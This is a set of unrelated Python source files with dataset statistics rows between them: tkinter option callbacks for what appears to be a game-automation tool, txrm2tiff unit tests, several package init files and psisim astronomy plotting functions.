self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_tobeol_degrade_number_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_notify_character_death_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_notify_tobeol_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_notify_migung_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_notify_world_boss_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_notify_urewanryo_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_hunt_pet_period_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_complete_sequence_booleanvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_complete_period_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_migung_invite_rank_op_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_migung_invite_rank2_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_migung_invite_rank_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_migung_invite_boolean_booleanvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_geomungiun2_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_geomungiun_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_jamjeryeok_dolpa_rank_order_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_gwangwonseok_hapseong_auto_booleanvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_sujeong_hapseong_auto_booleanvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_jamjeryeok_dolpa_rank_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_gwangwonseok_hapseong_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_sujeong_hapseong_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_character_move_time_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_character_move_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_sell_jamjeryoek_booleanvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_sell_boolean_booleanvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_sell_item_rank_6_booleanvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_sell_item_rank_5_booleanvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_sell_item_rank_4_booleanvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_sell_item_rank_3_booleanvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_sell_item_rank_2_booleanvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_sell_item_rank_1_booleanvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_sell_item_rank_0_booleanvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_sell_pummok_4_booleanvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_sell_pummok_3_booleanvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_sell_pummok_2_booleanvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_sell_pummok_1_booleanvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_sell_pummok_0_booleanvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_hunt_quest_click_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_period_wait_jadong_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_fix_target_booleanvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_quest_repeat_booleanvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_chracter_change_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_period_potion_shop_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_jadong_boolean_booleanvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_pet_number_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_potion_boolean_booleanvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_ddolmani_skill_0_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_ddolmani_skill_1_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_ddolmani_skill_2_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_period_gabang_full_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_period_jeoljeon_mode_warning_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_location_y_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_location_x_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_threshold_potion_empty_limit_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_threshold_moving_limit_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_threshold_migung_limit_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_threshold_sudong_limit_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_threshold_combat_box_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_hunt_period_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_loot_box_boolean_booleanvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_box_range_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_potion_thing_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_potion_limit_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_potion_set_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_potion_number_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_period_wait_attack_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_period_migung_lag_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_period_jadong_lag_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_period_mainquest_afk_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_period_mainquest_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_threshold_conversation_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_threshold_mainquest_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
# def callback_threshold_gate_stringvar(self, args, option_name):
# self.set_game_config(option_name, self.option_dic[option_name].get())
# def callback_threshold_next_stringvar(self, args, option_name):
# self.set_game_config(option_name, self.option_dic[option_name].get())
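Every callback above shares the same one-line body; only the method name differs. A minimal sketch of how one generic handler could replace the clones — `OptionPanel` and `StubVar` are illustrative stand-ins (tkinter `StringVar`/`BooleanVar` need a display to instantiate, so a plain stub is used here):

```python
class OptionPanel:
    """One generic trace callback instead of dozens of identical methods."""

    def __init__(self, option_dic):
        self.option_dic = option_dic   # option name -> object with a .get() method
        self.config = {}

    def set_game_config(self, option_name, value):
        self.config[option_name] = value

    def on_option_changed(self, args, option_name):
        # Shared body of every callback_*_stringvar/_booleanvar method above.
        self.set_game_config(option_name, self.option_dic[option_name].get())


class StubVar:
    """Stand-in for tkinter StringVar/BooleanVar (no display needed)."""

    def __init__(self, value):
        self._value = value

    def get(self):
        return self._value


panel = OptionPanel({"potion_limit": StubVar("30"), "sell_boolean": StubVar(True)})
panel.on_option_changed(None, "potion_limit")
panel.on_option_changed(None, "sell_boolean")
print(panel.config)  # {'potion_limit': '30', 'sell_boolean': True}
```

With real tkinter Variables, the same single method can be registered for every trace by binding `option_name` with `functools.partial`.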
# --- file: CursoEmVideo/Aula22/ex112/utilidades/__init__.py (repo: lucashsouza/Desafios-Python, license: MIT) ---
from Aula22.ex112.utilidades import moeda, dado
# --- file: src/features/__init__.py (repo: iscfgibarra/mlops-calculadora, license: FTL) ---
from .build_features import *
# --- file: tests/test_run.py (repo: DiamondLightSource/txrm2tiff, license: BSD-3-Clause) ---
import unittest
from unittest.mock import patch, MagicMock, call
from pathlib import Path
from tempfile import TemporaryDirectory
from random import randint, sample
from txrm2tiff.run import run, _batch_convert_files, _convert_and_save, _define_output_suffix, TxrmToImage
class TestRun(unittest.TestCase):
def test_define_output_suffix(self):
txrm_output = _define_output_suffix(Path("file.txrm"))
self.assertEqual("file.ome.tiff", str(txrm_output))
xrm_output = _define_output_suffix(Path("file.xrm"))
self.assertEqual("file.ome.tif", str(xrm_output))
txrm_output2 = _define_output_suffix(Path("file.extension"), ".txrm")
self.assertEqual("file.ome.tiff", str(txrm_output2))
xrm_output2 = _define_output_suffix(Path("file.extension"), ".xrm")
self.assertEqual("file.ome.tif", str(xrm_output2))
with self.assertRaises(NameError):
_define_output_suffix(Path("file.bad_extension"), None)
@patch('txrm2tiff.run.file_can_be_opened', MagicMock(return_value=True))
@patch('txrm2tiff.run.ole_file_works', MagicMock(return_value=True))
@patch.object(TxrmToImage, 'convert')
@patch.object(TxrmToImage, 'save')
def test_convert_and_save(self, mocked_save, mocked_convert):
input_filepath = Path("test_file.txrm")
_convert_and_save(input_filepath, None, None, False, None, False)
mocked_convert.assert_called_with(input_filepath, None, False, False)
mocked_save.assert_called_with(input_filepath.with_suffix(".ome.tiff"), None)
@patch('pathlib.Path.mkdir', MagicMock())
@patch('txrm2tiff.run.file_can_be_opened', MagicMock(return_value=True))
@patch('txrm2tiff.run.ole_file_works', MagicMock(return_value=True))
@patch.object(TxrmToImage, 'convert')
@patch.object(TxrmToImage, 'save')
def test_convert_and_save_with_str_output(self, mocked_save, mocked_convert):
input_filepath = Path("test_file.txrm")
output_str = "./output/file.extension"
_convert_and_save(input_filepath, output_str, None, False, None, False)
mocked_convert.assert_called_with(input_filepath, None, False, False)
mocked_save.assert_called_with(Path(output_str), None)
@patch('pathlib.Path.mkdir', MagicMock())
@patch('txrm2tiff.run.file_can_be_opened', MagicMock(return_value=True))
@patch('txrm2tiff.run.ole_file_works', MagicMock(return_value=True))
@patch.object(TxrmToImage, 'convert')
@patch.object(TxrmToImage, 'save')
def test_convert_and_save_with_dir_str_output(self, mocked_save, mocked_convert):
input_filepath = Path("test_file.txrm")
output_str = "./output"
_convert_and_save(input_filepath, output_str, None, False, None, False)
mocked_convert.assert_called_with(input_filepath, None, False, False)
mocked_save.assert_called_with((Path(output_str) / input_filepath.name).with_suffix(".ome.tiff"), None)
@patch('pathlib.Path.mkdir', MagicMock())
@patch('txrm2tiff.run.file_can_be_opened', MagicMock(return_value=True))
@patch('txrm2tiff.run.ole_file_works', MagicMock(return_value=True))
@patch.object(TxrmToImage, 'convert')
@patch.object(TxrmToImage, 'save')
def test_convert_and_save_with_ome_output(self, mocked_save, mocked_convert):
input_filepath = Path("test_file.txrm")
output_str = "./output/file.ome.tiff"
_convert_and_save(input_filepath, output_str, None, False, None, False)
mocked_convert.assert_called_with(input_filepath, None, False, False)
mocked_save.assert_called_with(Path(output_str), None)
@patch('pathlib.Path.mkdir', MagicMock())
@patch('txrm2tiff.run.file_can_be_opened', MagicMock(return_value=True))
@patch('txrm2tiff.run.ole_file_works', MagicMock(return_value=True))
@patch.object(TxrmToImage, 'convert')
@patch.object(TxrmToImage, 'save')
def test_convert_and_save_with_dir_Path_output(self, mocked_save, mocked_convert):
input_filepath = Path("test_file.txrm")
output_filepath = Path("./output/")
_convert_and_save(input_filepath, output_filepath, None, False, None, False)
mocked_convert.assert_called_with(input_filepath, None, False, False)
mocked_save.assert_called_with(_define_output_suffix(output_filepath / input_filepath.name), None)
@patch('txrm2tiff.run.file_can_be_opened', MagicMock(return_value=True))
@patch('txrm2tiff.run.ole_file_works', MagicMock(return_value=True))
@patch.object(TxrmToImage, 'convert')
@patch.object(TxrmToImage, 'save')
def test_convert_and_save_with_invalid_output(self, mocked_save, mocked_convert):
input_filepath = Path("test_file.txrm")
_convert_and_save(input_filepath, 12345, None, False, None, False)
mocked_convert.assert_called_with(input_filepath, None, False, False)
mocked_save.assert_called_with(_define_output_suffix(input_filepath), None)
def test_batch_convert_files_basic(self):
with patch('txrm2tiff.run._convert_and_save', MagicMock()) as mocked_convert:
with TemporaryDirectory(dir=".") as tmpdir:
tmppath = Path(tmpdir)
num_files = randint(5, 10)
fake_file_list = []
for i in sample(range(0, 99999), num_files):
fake_file = (tmppath / f"{i}.txrm")
fake_file.touch()
fake_file_list.append(fake_file)
_batch_convert_files(tmppath, None, False, None, False)
call_list = []
for fake_file in fake_file_list:
output_path = _define_output_suffix(fake_file)
call_list.append(call(fake_file, output_path, None, False, None, False))
mocked_convert.assert_has_calls(call_list, any_order=True)
def test_batch_convert_files_with_output_and_deep_dir(self):
with patch('txrm2tiff.run._convert_and_save', MagicMock()) as mocked_convert:
with TemporaryDirectory(dir=".") as tmp_in:
with TemporaryDirectory(dir=".") as tmp_out:
tmp_in_path = Path(tmp_in)
tmp_out_path = Path(tmp_out)
tmp_in_path_deep = tmp_in_path / "deep" / "dirs"
tmp_out_deep = tmp_out_path / "deep" / "dirs"
tmp_in_path_deep.mkdir(parents=True)
num_files = randint(5, 10)
fake_file_list = []
for i in sample(range(0, 99999), num_files):
fake_file = tmp_in_path_deep / f"{i}.txrm"
fake_file.touch()
fake_file_list.append(fake_file)
_batch_convert_files(tmp_in_path, tmp_out, False, None, False)
self.assertTrue(tmp_out_deep.exists())
call_list = []
for fake_file in fake_file_list:
output_path = _define_output_suffix(fake_file)
call_list.append(call(fake_file, tmp_out_deep / output_path.name, None, False, None, False))
mocked_convert.assert_has_calls(call_list, any_order=True)
def test_run_with_file(self):
with patch('txrm2tiff.run._convert_and_save', MagicMock()) as mocked_convert:
with TemporaryDirectory(dir=".") as tmp_in:
tmp_in_filepath = Path(tmp_in) / f"{randint(0,9999)}.xrm"
tmp_in_filepath.touch()
run(tmp_in_filepath)
mocked_convert.assert_called_with(tmp_in_filepath, None, None, False, None, False)
def test_run_with_dir(self):
with patch('txrm2tiff.run._batch_convert_files', MagicMock()) as mocked_batch_convert:
with TemporaryDirectory(dir=".") as tmp_in:
tmp_in_path = Path(tmp_in)
run(tmp_in_path)
mocked_batch_convert.assert_called_with(tmp_in_path, None, False, None, False)
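The assertions above fully determine the suffix mapping; a hedged re-creation of `_define_output_suffix` inferred from the tests (an illustration, not txrm2tiff's actual implementation):

```python
from pathlib import Path

def define_output_suffix(path, ext=None):
    # Inferred from the tests: .txrm -> .ome.tiff, .xrm -> .ome.tif;
    # any other extension raises NameError.
    ext = path.suffix if ext is None else ext
    if ext == ".txrm":
        return path.with_suffix(".ome.tiff")
    if ext == ".xrm":
        return path.with_suffix(".ome.tif")
    raise NameError(f"Cannot derive output suffix from {ext!r}")

print(define_output_suffix(Path("file.txrm")))               # file.ome.tiff
print(define_output_suffix(Path("file.extension"), ".xrm"))  # file.ome.tif
```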
# --- file: sdcclient/monitor/dashboard_converters/__init__.py (repo: dark-vex/sysdig-sdk-python, license: MIT) ---
from ._dashboard_scope import convert_scope_string_to_expression
from ._dashboard_versions import convert_dashboard_between_versions
__all__ = ["convert_dashboard_between_versions", "convert_scope_string_to_expression"]
| 44.2 | 86 | 0.895928 | 27 | 221 | 6.518519 | 0.407407 | 0.147727 | 0.204545 | 0.227273 | 0.340909 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.058824 | 221 | 4 | 87 | 55.25 | 0.846154 | 0 | 0 | 0 | 0 | 0 | 0.307692 | 0.307692 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.666667 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
03622fc54ba2754357cc93fce949c2675566af30 | 36 | py | Python | python_utility/__init__.py | masked-runner/pi-util | f97a4ff34510c83f4b17e9585bc15cfa66b537dc | [
"MIT"
] | null | null | null | python_utility/__init__.py | masked-runner/pi-util | f97a4ff34510c83f4b17e9585bc15cfa66b537dc | [
"MIT"
] | null | null | null | python_utility/__init__.py | masked-runner/pi-util | f97a4ff34510c83f4b17e9585bc15cfa66b537dc | [
"MIT"
] | null | null | null | from python_utility.util import Util | 36 | 36 | 0.888889 | 6 | 36 | 5.166667 | 0.833333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.083333 | 36 | 1 | 36 | 36 | 0.939394 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
# --- file: src/snc/agents/activity_rate_to_mpc_actions/mpc_utils.py (repo: dmcnamee/snc, license: Apache-2.0) ---
def check_num_time_steps(num_mpc_steps: int) -> None:
assert isinstance(num_mpc_steps, int), "Number of MPC steps is not integer."
assert num_mpc_steps >= 1, "Number of MPC steps is zero or negative."
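A quick usage sketch of the validator (restated here so the snippet runs on its own); note that because `bool` is a subclass of `int`, a value like `True` would slip through the `isinstance` check:

```python
def check_num_time_steps(num_mpc_steps: int) -> None:
    assert isinstance(num_mpc_steps, int), "Number of MPC steps is not integer."
    assert num_mpc_steps >= 1, "Number of MPC steps is zero or negative."

check_num_time_steps(10)  # valid horizon: passes silently

try:
    check_num_time_steps(0)
except AssertionError as err:
    msg = str(err)
print(msg)  # Number of MPC steps is zero or negative.
```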
# --- file: pysindy/deeptime/__init__.py (repo: znicolaou/pysindy, license: MIT) ---
from .deeptime import SINDyEstimator
from .deeptime import SINDyModel
__all__ = ["SINDyEstimator", "SINDyModel"]
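`__all__` here limits what `from pysindy.deeptime import *` re-exports to the two public names; a small throwaway-module illustration of the mechanism (unrelated to pysindy's real modules):

```python
import sys
import types

# Build a disposable module with three attributes but only one exported name.
mod = types.ModuleType("demo_pkg")
mod.public = 1
mod._private = 2
mod.extra = 3
mod.__all__ = ["public"]
sys.modules["demo_pkg"] = mod

ns = {}
exec("from demo_pkg import *", ns)
print(sorted(k for k in ns if not k.startswith("__")))  # ['public']
```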
# --- file: lib/psa/functional.py (repo: Hemanth-Gattu/TrSeg, license: MIT) ---
"""Functional interface"""
from . import functions
def psa_mask(input, psa_type=0, mask_H_=None, mask_W_=None):
return functions.PSAMask(psa_type, mask_H_, mask_W_)(input)
# --- file: psisim/plots.py (repo: abgibbs/psisim, license: BSD-3-Clause) ---
import matplotlib.pyplot as plt
import numpy as np
import matplotlib.colors as colors
import astropy.units as u
def make_plots():
'''
A dummy function.
'''
pass
def plot_detected_planet_contrasts(planet_table,wv_index,detected,flux_ratios,instrument,telescope,
show=True,save=False,ymin=1e-9,ymax=1e-4,xmin=0.,xmax=1.,alt_data=None,alt_label=""):
'''
Make a plot of the planets detected at a given wavelength index
Inputs:
planet_table - a Universe.planets table
wv_index - the index from the instrument.current_wvs
wavelength array to consider
detected - a boolean array of shape [n_planets,n_wvs]
that indicates whether or not a planet was detected
at a given wavelength
flux_ratios - an array of flux ratios between the planet and the star
at the given wavelength. shape [n_planets,n_wvs]
instrument - an instance of the psisim.instrument class
telescope - an instance of the psisim.telescope class
Keyword Arguments:
show - do you want to show the plot? Boolean
save - do you want to save the plot? Boolean
ymin,ymax,xmin,xmax - the limits on the plot
alt_data - An optional argument to pass to show a secondary set of data.
This could be e.g. detection limits, or another set of atmospheric models
alt_label - This sets the legend label for the alt_data
'''
fig,ax = plt.subplots(1,1,figsize=(7,5))
seps = np.array([planet_table_entry['AngSep'].to(u.arcsec).value for planet_table_entry in planet_table])
# import pdb; pdb.set_trace()
#Plot the non-detections
ax.scatter(seps[~detected[:,wv_index]],flux_ratios[:,wv_index][~detected[:,wv_index]],
marker='.',label="Full Sample",s=20)
# print(seps[~detected[:,wv_index]],flux_ratios[:,wv_index][~detected[:,wv_index]])
masses = np.array([planet_table_entry['PlanetMass'].to(u.earthMass).value for planet_table_entry in planet_table])
# import pdb; pdb.set_trace()
# import pdb; pdb.set_trace()
#Plot the detections
scat = ax.scatter(seps[detected[:,wv_index]],flux_ratios[:,wv_index][detected[:,wv_index]],marker='o',
label="Detected",c=masses[detected[:,wv_index]],cmap='gist_heat',edgecolors='k',norm=colors.LogNorm(vmin=1,vmax=1000))
fig.colorbar(scat,label=r"Planet Mass [$M_{\oplus}$]",ax=ax)
#Plot 1 and 2 lambda/d
ax.plot([instrument.current_wvs[wv_index]*1e-6/telescope.diameter*206265,instrument.current_wvs[wv_index]*1e-6/telescope.diameter*206265],
[0,1.],label=r"$\lambda/D$ at $\lambda=${:.3f}$\mu m$".format(instrument.current_wvs[wv_index]),color='k')
ax.plot([2*instrument.current_wvs[wv_index]*1e-6/telescope.diameter*206265,2*instrument.current_wvs[wv_index]*1e-6/telescope.diameter*206265],
[0,1.],'-.',label=r"$2\lambda/D$ at $\lambda=${:.3f}$\mu m$".format(instrument.current_wvs[wv_index]),color='k')
#If detection_limits is passed, then plot the 5-sigma detection limits for each source
if alt_data is not None:
ax.scatter(seps,alt_data[:,wv_index],marker='.',
label=alt_label,color='darkviolet',s=20)
for i,sep in enumerate(seps):
ax.plot([sep,sep],[flux_ratios[i,wv_index],alt_data[i,wv_index]],color='k',alpha=0.1,linewidth=1)
#Axis title
ax.set_title("Planet Detection Yield at {:.3}um".format(instrument.current_wvs[wv_index]),fontsize=18)
#Legend
legend = ax.legend(loc='upper right',fontsize=13)
legend.legendHandles[-1].set_color('orangered')
legend.legendHandles[-1].set_edgecolor('k')
#Plot setup
ax.set_ylabel("Total Intensity Flux Ratio",fontsize=16)
ax.set_xlabel("Separation ['']",fontsize=16)
# ax.set_xlim(xmin,xmax)
ax.set_ylim(ymin,ymax)
ax.set_yscale('log')
ax.set_xscale('log')
#Do we show it?
if show:
plt.show()
plt.tight_layout()
#Do we save it?
if save:
plt.savefig("Detected_Planets_flux_v_sma.png",bbox_inches="tight")
#Return the figure so that the user can manipulate it more if they so please
return fig,ax
def plot_detected_planet_magnitudes(planet_table,wv_index,detected,flux_ratios,instrument,telescope,
show=True,save=False,ymin=1,ymax=30,xmin=0.,xmax=1.,alt_data=None,alt_label=""):
'''
Make a plot of the planets detected at a given wavelength index
Inputs:
planet_table - a Universe.planets table
wv_index - the index from the instrument.current_wvs
wavelength array to consider
detected - a boolean array of shape [n_planets,n_wvs]
that indicates whether or not a planet was detected
at a given wavelength
flux_ratios - an array of flux ratios between the planet and the star
at the given wavelength. shape [n_planets,n_wvs]
instrument - an instance of the psisim.instrument class
telescope - an instance of the psisim.telescope class
Keyword Arguments:
show - do you want to show the plot? Boolean
save - do you want to save the plot? Boolean
ymin,ymax,xmin,xmax - the limits on the plot
alt_data - An optional argument to pass to show a secondary set of data.
This could be e.g. detection limits, or another set of atmospheric models
alt_label - This sets the legend label for the alt_data
'''
fig,ax = plt.subplots(1,1,figsize=(7,5))
#convert flux ratios to delta_mags
dMags = -2.5*np.log10(flux_ratios[:,wv_index])
band = instrument.current_filter
if band == 'R':
bexlabel = 'CousinsR'
starlabel = 'StarRmag'
elif band == 'I':
bexlabel = 'CousinsI'
starlabel = 'StarImag'
elif band == 'J':
bexlabel = 'SPHEREJ'
starlabel = 'StarJmag'
elif band == 'H':
bexlabel = 'SPHEREH'
starlabel = 'StarHmag'
elif band == 'K':
bexlabel = 'SPHEREKs'
starlabel = 'StarKmag'
elif band == 'L':
bexlabel = 'NACOLp'
starlabel = 'StarKmag'
elif band == 'M':
bexlabel = 'NACOMp'
starlabel = 'StarKmag'
else:
raise ValueError("Band needs to be 'R', 'I', 'J', 'H', 'K', 'L', 'M'. Got {0}.".format(band))
stellar_mags = planet_table[starlabel]
stellar_mags = np.array(stellar_mags)
planet_mag = stellar_mags+dMags
# import pdb;pdb.set_trace()
seps = np.array([planet_table_entry['AngSep'].to(u.arcsec).value for planet_table_entry in planet_table])
# import pdb; pdb.set_trace()
#Plot the non-detections
ax.scatter(seps[~detected[:,wv_index]],planet_mag[:][~detected[:,wv_index]],
marker='.',label="Full Sample",s=20)
# print(seps[~detected[:,wv_index]],flux_ratios[:,wv_index][~detected[:,wv_index]])
masses = np.array([planet_table_entry['PlanetMass'].to(u.earthMass).value for planet_table_entry in planet_table])
# import pdb; pdb.set_trace()
# import pdb; pdb.set_trace()
#Plot the detections
scat = ax.scatter(seps[detected[:,wv_index]],planet_mag[:][detected[:,wv_index]],marker='o',
label="Detected",c=masses[detected[:,wv_index]],cmap='gist_heat',edgecolors='k',norm=colors.LogNorm(vmin=1,vmax=1000))
fig.colorbar(scat,label=r"Planet Mass [$M_{\oplus}$]",ax=ax)
# import pdb; pdb.set_trace()
#Plot 1 and 2 lambda/d
ax.axvline(instrument.current_wvs[wv_index]*1e-6/telescope.diameter*206265,color='k',)
ax.axvline(2*instrument.current_wvs[wv_index]*1e-6/telescope.diameter*206265,color='k',linestyle='--')
ax.axhline(18.7+0.4,color='r',linestyle='-.',label="")
#If detection_limits is passed, then plot the 5-sigma detection limits for each source
if alt_data is not None:
ax.scatter(seps,alt_data[:,wv_index],marker='.',
label=alt_label,color='darkviolet',s=20)
for i,sep in enumerate(seps):
ax.plot([sep,sep],[flux_ratios[i,wv_index],alt_data[i,wv_index]],color='k',alpha=0.1,linewidth=1)
#Axis title
ax.set_title("Planet Detection Yield at {:.3}um".format(instrument.current_wvs[wv_index]),fontsize=18)
#Legend
legend = ax.legend(loc='upper right',fontsize=13)
legend.legendHandles[-1].set_color('orangered')
legend.legendHandles[-1].set_edgecolor('k')
#Plot setup
ax.set_ylabel(r"Planet Magnitude at {:.1f}$\mu m$".format(instrument.current_wvs[wv_index]),fontsize=16)
ax.set_xlabel("Separation ['']",fontsize=16)
# ax.set_xlim(xmin,xmax)
ax.set_ylim(ymin,ymax)
# ax.set_yscale('log')
ax.set_xscale('log')
#Do we show it?
if show:
plt.show()
plt.tight_layout()
#Do we save it?
if save:
plt.savefig("Detected_Planets_flux_v_sma.png",bbox_inches="tight")
#Return the figure so that the user can manipulate it more if they so please
return fig,ax
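The `dMags = -2.5*np.log10(flux_ratios[:,wv_index])` step above is the standard flux-ratio-to-magnitude conversion; a worked example with made-up numbers:

```python
import numpy as np

flux_ratios = np.array([1e-4, 1e-6, 1e-8])  # hypothetical planet/star flux ratios
dmags = -2.5 * np.log10(flux_ratios)        # contrasts in magnitudes: 10, 15, 20
star_mag = 8.0                              # hypothetical host-star magnitude
planet_mags = star_mag + dmags              # apparent planet magnitudes
print(planet_mags)  # [18. 23. 28.]
```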
def plot_detected_planet_mass(planet_table,detected,show=True,**kwargs):
'''
Plot a histogram of detected and non-detected planets
'''
masses = np.array([planet_table_entry['PlanetMass'].to(u.earthMass).value for planet_table_entry in planet_table])
fig = plt.figure(figsize=(7,4))
ax1 = fig.add_subplot(111)
ax1.hist(masses[~detected],label="Non-Detections",density=True,**kwargs)
ax1.hist(masses[detected],label="Detections",density=True,**kwargs)
ax1.set_xlabel(r"Planet Masses [M$_{Earth}$]")
ax1.set_ylabel(r"Number of Planets")
ax1.set_xscale("log")
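The histogram function above indexes the mass array with boolean masks (`detected`, `~detected`), which only works on NumPy arrays, not plain lists. A minimal sketch with made-up masses and a hypothetical detection mask:

```python
import numpy as np

# Hypothetical planet masses (Earth masses) and a boolean detection mask
masses = np.array([0.8, 5.0, 12.0, 300.0, 1.5])
detected = np.array([False, True, True, True, False])

detected_masses = masses[detected]    # planets recovered by the survey
missed_masses = masses[~detected]     # planets below the detection limit

print(detected_masses.tolist())  # [5.0, 12.0, 300.0]
print(missed_masses.tolist())    # [0.8, 1.5]
```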
